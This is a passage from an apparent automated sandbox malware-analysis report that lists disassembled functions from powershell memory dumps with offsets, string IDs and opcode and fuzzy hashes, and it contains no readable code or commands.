                          • API ID:
                          • String ID: $^q$$^q
                          • API String ID: 0-355816377
                          • Opcode ID: 737c1892d47dc9a7f47dad371a63cbf9f1c1d73d2fbd9601c3ba9747d74e0c13
                          • Instruction ID: 65f3202ebe4e6fae9b0c3fc4e386863d2e9f800ff0f58d2f72a9f972f33dcb86
                          • Opcode Fuzzy Hash: 737c1892d47dc9a7f47dad371a63cbf9f1c1d73d2fbd9601c3ba9747d74e0c13
                          • Instruction Fuzzy Hash: C1218EB03383EE7BDB2509758800F637FA59F86610F248067E940CF286D979C596C361
                          Function 07224EFA Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l
                          • API String ID: 0-3178505098
                          • Opcode ID: 600e90d471df2a3a147ac643b164d5990c46113f1e3373a59f92a5f65077da26
                          • Instruction ID: e85cd35d5a2773c4979c40f46249ffb03a9eba05b07a23f0f3292d6b9f8b7afe
                          • Opcode Fuzzy Hash: 600e90d471df2a3a147ac643b164d5990c46113f1e3373a59f92a5f65077da26
                          • Instruction Fuzzy Hash: 249190B0B10215EFCB14DB65C951B9EBBB2EB88300F10C1A9E9016F795CB71EC52CB91
                          Function 04392FF8 Relevance: .5, Instructions: 456COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ba3633225173d4c9d80aadcc3dfd01ec655c5db5f6c1074a00fe00a6d9bf009
                          • Instruction ID: 81886961af9a534e72a106f0d13a993bf860b968fd31b0995ebd46b1f5579666
                          • Opcode Fuzzy Hash: 5ba3633225173d4c9d80aadcc3dfd01ec655c5db5f6c1074a00fe00a6d9bf009
                          • Instruction Fuzzy Hash: 151227B4A002499FCB05CF99D584AAEFBF2EF48310F258559E815AB365C735ED81CF90
                          Function 04398F00 Relevance: .3, Instructions: 325COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47488ce58a55a932ba3059a2d1c191a47009138a486ae47ce6c735110d73fe34
                          • Instruction ID: 73a0438992cea1a85c50230b4f1e4207d4cf46808f1995abd434e61e1814bffb
                          • Opcode Fuzzy Hash: 47488ce58a55a932ba3059a2d1c191a47009138a486ae47ce6c735110d73fe34
                          • Instruction Fuzzy Hash: 71C18D71A002089FDF18EFA4D984AADBBF6FF85310F159559E806AB364DB34ED49CB40
                          Function 043939B8 Relevance: .3, Instructions: 319COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff77c5c304df55fcf6ff69e2e1090e2e1422409d9c8e2ee3c236613b097f2359
                          • Instruction ID: e0753249022a0397fef5101c0c629926a09b1793b7602bad5a2f1fc26eba8ffc
                          • Opcode Fuzzy Hash: ff77c5c304df55fcf6ff69e2e1090e2e1422409d9c8e2ee3c236613b097f2359
                          • Instruction Fuzzy Hash: 91D1E774A00219AFDB15DF98D584A9DFBF2FF88320F298559E805AB365C731ED81CB90
                          Function 04393711 Relevance: .3, Instructions: 308COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8a1283977682651f47ac2adcbe9373fa9da82e1ec910707bcd3638540449f07c
                          • Instruction ID: f3b40ec8241179e534413d96390c54c3adb9f602fb7a58ea618d8c4d6ea79a19
                          • Opcode Fuzzy Hash: 8a1283977682651f47ac2adcbe9373fa9da82e1ec910707bcd3638540449f07c
                          • Instruction Fuzzy Hash: 07A15A6255E3E05FCB03AB2C98B44D67FB09E4B62470A04E7D4C0DF1B3D2289D89C7A6
                          Function 0439F0B4 Relevance: .3, Instructions: 281COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8a0ca452dae126dba777ccaed1099fcc2aaefc360ed852b6ca3b6f5135e1d018
                          • Instruction ID: f21a072a1433b7c7419d5bbc5080dcf8b2930a1e550271713ec2654aa59a2b7c
                          • Opcode Fuzzy Hash: 8a0ca452dae126dba777ccaed1099fcc2aaefc360ed852b6ca3b6f5135e1d018
                          • Instruction Fuzzy Hash: E8B17D71E10209DFDF14CFA9C88579EBBF1AF48318F249129D819E7294EB74AC45CB85
                          Function 0439F984 Relevance: .3, Instructions: 266COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d0ce0375f7e7cc5041b71d8271c8468b03572f67ad01f60573363ded1e0ece4
                          • Instruction ID: 0a218784379e661dca898826403bb0faa1b4f18d4f82ed1e5d3b321343f8ff16
                          • Opcode Fuzzy Hash: 2d0ce0375f7e7cc5041b71d8271c8468b03572f67ad01f60573363ded1e0ece4
                          • Instruction Fuzzy Hash: 31B17C70E10209DFDF10CFA9D88179DBBF2AF48314F149529E819EB294EB74A885CF81
                          Function 043996C8 Relevance: .2, Instructions: 205COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d621c2fe44188069712c68c6bc326c6244f98f5bdd31aa0d68a3eb2189cdbc9e
                          • Instruction ID: 83deae43aee1e0004470052d1811db707538fe53039be18ddcf77402ad91004d
                          • Opcode Fuzzy Hash: d621c2fe44188069712c68c6bc326c6244f98f5bdd31aa0d68a3eb2189cdbc9e
                          • Instruction Fuzzy Hash: 3A719070A002098FCB14DF69D880A9DBBF6FF85314F148569E416DB751DB75EC46CB90
                          Function 04398768 Relevance: .2, Instructions: 200COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1394e6b0d3d2ba6664b5f8f13bf6872a3356410aa5444a27a1dc945f46bd56f
                          • Instruction ID: ed2bd35c3c31bb8d033a056b906cafd2865c049d3e1df5c972d51778c3093c08
                          • Opcode Fuzzy Hash: e1394e6b0d3d2ba6664b5f8f13bf6872a3356410aa5444a27a1dc945f46bd56f
                          • Instruction Fuzzy Hash: 8481AF35A15204DFCB19DF64C4849AEBBF2BF8A304F1984A9E405AB361DB35ED85CB50
                          Function 04399836 Relevance: .2, Instructions: 188COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6fa37976aa2d7454911c139fad7c89ffe91e4e480f3e764c891acaa8d459b49d
                          • Instruction ID: ec42339403fdf2f6f1d038fdb1f8b5c57db71536eb23ee773f53fa6c32e19b59
                          • Opcode Fuzzy Hash: 6fa37976aa2d7454911c139fad7c89ffe91e4e480f3e764c891acaa8d459b49d
                          • Instruction Fuzzy Hash: DC711770E002089FDF14DFA5D584BADBBF2BF88314F148429E416AB7A0DB75AD86CB51
                          Function 0439F6FD Relevance: .2, Instructions: 183COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 92aa1ed89e8f86ddd6a497177a4ec7eb873826314f29c630f253834ddff7a51a
                          • Instruction ID: 562877944c8a6e77de29d9f96777f8deb56a01a832b4c2ad86f6ce89b526b1cf
                          • Opcode Fuzzy Hash: 92aa1ed89e8f86ddd6a497177a4ec7eb873826314f29c630f253834ddff7a51a
                          • Instruction Fuzzy Hash: C9715CB1E00209DFDF10CFA9C8817DEBBF1AF48718F149129E815EB254EB74A846CB95
                          Function 0439F708 Relevance: .2, Instructions: 180COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f8a6b7c7fead6799ec1cdcc703377ad8c2e227d682e72a388518a480665e175
                          • Instruction ID: 7fa6890961be8e6dbd527e0a1eecdcd797b41e54304eb61f3c3cfabb1bdd9c13
                          • Opcode Fuzzy Hash: 2f8a6b7c7fead6799ec1cdcc703377ad8c2e227d682e72a388518a480665e175
                          • Instruction Fuzzy Hash: DA715BB1E002099FDF14CFA9C8817DEBBF2AF88318F149129E415E7254EB74A846CB95
                          Function 0722A16D Relevance: .1, Instructions: 145COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f683b980437eab24c33550c856b54d79fc151b19b9bc8b7c3c83bec78f7cec7c
                          • Instruction ID: 1793188b2ad545fb265fbb9981a060899737433198d73a26836ce04a69b3074e
                          • Opcode Fuzzy Hash: f683b980437eab24c33550c856b54d79fc151b19b9bc8b7c3c83bec78f7cec7c
                          • Instruction Fuzzy Hash: D641C1F1B10275ABCB25D778940159AFFB29FD2324B04C5AEDD019FB52D922C806D7A1
                          Function 04399459 Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 027532667577e08fbda7a4e24430d0d8010b6074c47e279f5002704f58eed227
                          • Instruction ID: 3c7284cae5202626550114e2a6cf71ff01029683b4affc6d4cd4b670c3e55b9f
                          • Opcode Fuzzy Hash: 027532667577e08fbda7a4e24430d0d8010b6074c47e279f5002704f58eed227
                          • Instruction Fuzzy Hash: FD417C71A406048FEB14DB64C854AAEBBF6AF89720F14546CE806EB7A0DF35EC42CB50
                          Function 043946ED Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ed480d1412b742bf0d832384abc85656161a7d3cf398371a89f7226bba42fc0
                          • Instruction ID: 70e9d46297ab8bcaf1d4bc1be139e1d72569fcc24153da34581ba016875fa94f
                          • Opcode Fuzzy Hash: 4ed480d1412b742bf0d832384abc85656161a7d3cf398371a89f7226bba42fc0
                          • Instruction Fuzzy Hash: BE51F535A04258AFDB04DF98D480A9CFBF2FF49320F159559E819AB351C731ED86CB90
                          Function 043996B3 Relevance: .1, Instructions: 119COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d6cad1769137469e12d482f3dbcea6ccce4078ee54dcb31511c2b45faf7463b
                          • Instruction ID: 560b6339c96d0d5dc09c5faee5a28ecb4691bfef4301e35f785eb9e9bba4b80d
                          • Opcode Fuzzy Hash: 3d6cad1769137469e12d482f3dbcea6ccce4078ee54dcb31511c2b45faf7463b
                          • Instruction Fuzzy Hash: CC4138B0E002099FDB14DFA9C9847ADBBF2BF88314F14842DD806AB794DB74AC85CB50
                          Function 04393448 Relevance: .1, Instructions: 112COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a1b5533cc23fb1907e6ad7ed5710d22103fedb6c861b2389cc6fba366630cf6
                          • Instruction ID: faa352167374c72b06a0c8f1bc9272f1e27f865e214ef99adb40c8fd4a26ca96
                          • Opcode Fuzzy Hash: 3a1b5533cc23fb1907e6ad7ed5710d22103fedb6c861b2389cc6fba366630cf6
                          • Instruction Fuzzy Hash: C04108B4A005059FCB06CF99C5989AAFBB1FF4C310B25859AD905AB364C736FC50CFA0
                          Function 07227B1E Relevance: .1, Instructions: 102COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f5df8207f1df318a844fda8db547b8f33d5ea66c96c3bac1aee28cf96f5405d
                          • Instruction ID: 3f98f6a495c78ef166e20b10bcd37d3a28e7553969ff4d9d7bf1a551b341063f
                          • Opcode Fuzzy Hash: 1f5df8207f1df318a844fda8db547b8f33d5ea66c96c3bac1aee28cf96f5405d
                          • Instruction Fuzzy Hash: 1331C5B0741218AFD7189778C955FAE7BA3AB85340F10C468EA017F7A5CE76DC428BD1
                          Function 07220F40 Relevance: .1, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d90639df7448b9b956a7d112332a45d2891adb542dddc0eafe2ce6b575ce903e
                          • Instruction ID: 37cb1849c9f7ee9a4405b54cd6bcfd78b3088ad2755fac003e5f89289bbd9666
                          • Opcode Fuzzy Hash: d90639df7448b9b956a7d112332a45d2891adb542dddc0eafe2ce6b575ce903e
                          • Instruction Fuzzy Hash: F5218EB176036B7BDB345979C841B3BB6C59BC8700F24C43AA905CF384DD75D9469361
                          Function 0439C288 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84059dd1f87ce9d43df14f212e52dcf16f4caab4c33949e9858c86975973e92a
                          • Instruction ID: 7ce662df54f524d8639af696b5728ad5fc0b323ba3e9308b5cf53287e53ab9bb
                          • Opcode Fuzzy Hash: 84059dd1f87ce9d43df14f212e52dcf16f4caab4c33949e9858c86975973e92a
                          • Instruction Fuzzy Hash: B1313730A011688FCF25DB64C894AEEB7F2BF89305F1554E9D40AAB251DF35AE81DF81
                          Function 0439398D Relevance: .1, Instructions: 85COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4d56c86899b3a66ffbfaaff9c16af10bf371c184708e3236a949aba390bebde
                          • Instruction ID: 2465153c946a8275d910c7ca13974cc600578ce29c1963fb88a5d3704a7f13e2
                          • Opcode Fuzzy Hash: a4d56c86899b3a66ffbfaaff9c16af10bf371c184708e3236a949aba390bebde
                          • Instruction Fuzzy Hash: 25315AB5A042559FCB05DF58C8948AAFFF1FF89310B15459AE848EB362C331ED41CBA0
                          Function 07220F26 Relevance: .1, Instructions: 80COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ab859e220b28c8050886916d2c5108c2f6d25c52dbfd3e96c308d827fa793ee
                          • Instruction ID: fdefaebf18b0a22d4aa1dc0bb5c3f86b06245af92df8ffff27a248b04859cd68
                          • Opcode Fuzzy Hash: 5ab859e220b28c8050886916d2c5108c2f6d25c52dbfd3e96c308d827fa793ee
                          • Instruction Fuzzy Hash: A221E1B132839A7BD7340A76C8517767FA19F86300F288467E844CF2D2DE38C956C361
                          Function 04394679 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0fbd2a07880576693b762bda331daa1f04c67d45730099469f018df006fadabf
                          • Instruction ID: 24d3f0ea441ebb26fac34fb38f65dc15cd6d19bf009ccd891e831c4dc4e71fb1
                          • Opcode Fuzzy Hash: 0fbd2a07880576693b762bda331daa1f04c67d45730099469f018df006fadabf
                          • Instruction Fuzzy Hash: 20210575A042099FCB00CF59C9809AEFBF1FB48310B24856AE819EB761C735EC42CBA0
                          Function 07220D30 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72dd15f357ce27c550b882df58481f691e1186c5a39bda208d8f06b657b2a227
                          • Instruction ID: 16200b6b53ddedc67ab8a83c9ea01f1d16d8541682e03d17c8bb907518e2ab62
                          • Opcode Fuzzy Hash: 72dd15f357ce27c550b882df58481f691e1186c5a39bda208d8f06b657b2a227
                          • Instruction Fuzzy Hash: 3F01207632022B6BCB3459A9D40067BFB95DFC1621F14C43FD945CB250D672E447D7A0
                          Function 0439F3AB Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a335899cd3f943fc8112916dfc3915869f939b18f703ea02dbd30a12aadfb21a
                          • Instruction ID: 98f531c6b616cd2b92b451589fe6de896f0d3910c234c5dd3e4596200129da8f
                          • Opcode Fuzzy Hash: a335899cd3f943fc8112916dfc3915869f939b18f703ea02dbd30a12aadfb21a
                          • Instruction Fuzzy Hash: 5C115631D10159DBEF24DA94E5987ECB7F1AF4531DF24342AC411F6190EB746C8ACB16
                          Function 029ED01D Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4211916657.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_29ed000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d9ab37e6c38e493b3e5620cad3a257f87f6d27b7b88ae72a66cf695272363a24
                          • Instruction ID: f13e01b0c00ddac3ba742617e680e3e31839ee74a480db0b2746cd17b1208399
                          • Opcode Fuzzy Hash: d9ab37e6c38e493b3e5620cad3a257f87f6d27b7b88ae72a66cf695272363a24
                          • Instruction Fuzzy Hash: C9012B71009300AAEB114A25CD84767BFDCEF41325F0CC929EC4A0F186C379D941C6B1
                          Function 04392F6B Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fdbb6f1a695409a5ac8c27753bbd4eff334f0478dba2a5826fc31942bd0ac9a5
                          • Instruction ID: 5a2733f6c481a3b40701ecd4bcc43febf31c34cdcd38c6efc7483a84e61a7f32
                          • Opcode Fuzzy Hash: fdbb6f1a695409a5ac8c27753bbd4eff334f0478dba2a5826fc31942bd0ac9a5
                          • Instruction Fuzzy Hash: 27018474B406149FCB00CF98C480AAEF7B1FF8D300B218599D41A97361C636EC038B50
                          Function 029ED01C Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4211916657.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_29ed000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f76deb09e5a102c6289d28afefd7b1687bbd4b4677601272af92f71e4b317cc
                          • Instruction ID: cfe882973c29b442b05f7e16e087991a90d626d68180a67975901d38da44da7d
                          • Opcode Fuzzy Hash: 1f76deb09e5a102c6289d28afefd7b1687bbd4b4677601272af92f71e4b317cc
                          • Instruction Fuzzy Hash: 75F0C271005340AEEB118A16CD84B62FFACEB41235F18C55AED480E286C3799845CAB1
                          Function 072230D9 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b4529ffa44934527c14fa49e0c22230617ad48eba0e69b78837b4b82c3f868e5
                          • Instruction ID: 8d2df828e42b06f34dbbbed064d8a6c4b8fa03f61d3276c822722da809fb4137
                          • Opcode Fuzzy Hash: b4529ffa44934527c14fa49e0c22230617ad48eba0e69b78837b4b82c3f868e5
                          • Instruction Fuzzy Hash: 13E092F4664252BBC715DBA4C811952FBA1FF8D20071C818ED0484F267DE66D943D711

                          Non-executed Functions

                          Function 029EDAAC Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4211916657.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 029ED000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_29ed000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 752553269344957e2d4bf95b517b2d973fe8d913a8b199668468ff81e311adf0
                          • Instruction ID: 633b812d21d8f0967b4f04d42b21c0fbf839aab8fcb0ac34f092cdc7a28c02ae
                          • Opcode Fuzzy Hash: 752553269344957e2d4bf95b517b2d973fe8d913a8b199668468ff81e311adf0
                          • Instruction Fuzzy Hash: CF2102B1604200DFDB06DF14D680B2ABBADEB84724F28C66DD90A4B241D379D446C672
                          Function 0722D42D Relevance: 19.0, Strings: 15, Instructions: 285COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$84"l$84"l$84"l$84"l$tP^q$tP^q$tP^q$tP^q$$^q$(dq$(dq$(dq$(dq
                          • API String ID: 0-3927097184
                          • Opcode ID: 2e85592af45ff275e9c1e0ef43e1d55332b70cb81688cbf722bd24c75cfd8b03
                          • Instruction ID: 297e62d2d0a6c12bd311240e66d58ec28e667fbf9b21430f152ff3fc928b581d
                          • Opcode Fuzzy Hash: 2e85592af45ff275e9c1e0ef43e1d55332b70cb81688cbf722bd24c75cfd8b03
                          • Instruction Fuzzy Hash: F8A121B1B2012AEFCB249F68D44467ABBE2BF88310F248459EC055F395CB75DC46DB91
                          Function 0722CBB5 Relevance: 14.0, Strings: 11, Instructions: 209COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$84"l$84"l$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                          • API String ID: 0-167530296
                          • Opcode ID: 63e7e24c542b5578846bf694e1692b5d7457c27106164817c4942e59a92d3801
                          • Instruction ID: 45f65eb8503d4d40a689f6728675e14bef7bc7616c6c46840936e42e7e136541
                          • Opcode Fuzzy Hash: 63e7e24c542b5578846bf694e1692b5d7457c27106164817c4942e59a92d3801
                          • Instruction Fuzzy Hash: 75710BB1B2026ABFCB299F24C44466EBBE2AF85710F148469D9019F364DB71CCC6D7B1
                          Function 072212C8 Relevance: 10.5, Strings: 8, Instructions: 471COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q
                          • API String ID: 0-517161784
                          • Opcode ID: 62b9921cac2e7411d9bf262cbfaf4f8285d1e32ff468500f14b64dc82e3ada13
                          • Instruction ID: 7d7d7df66ed1848dbb21743efa41b947f5222964a1902d7266f99b6356af9ea1
                          • Opcode Fuzzy Hash: 62b9921cac2e7411d9bf262cbfaf4f8285d1e32ff468500f14b64dc82e3ada13
                          • Instruction Fuzzy Hash: 26127BB4B21219AFD714CB58C441EAEBBB3BB88304F14C069E905AF755CB76EC46CB91
                          Function 07226270 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
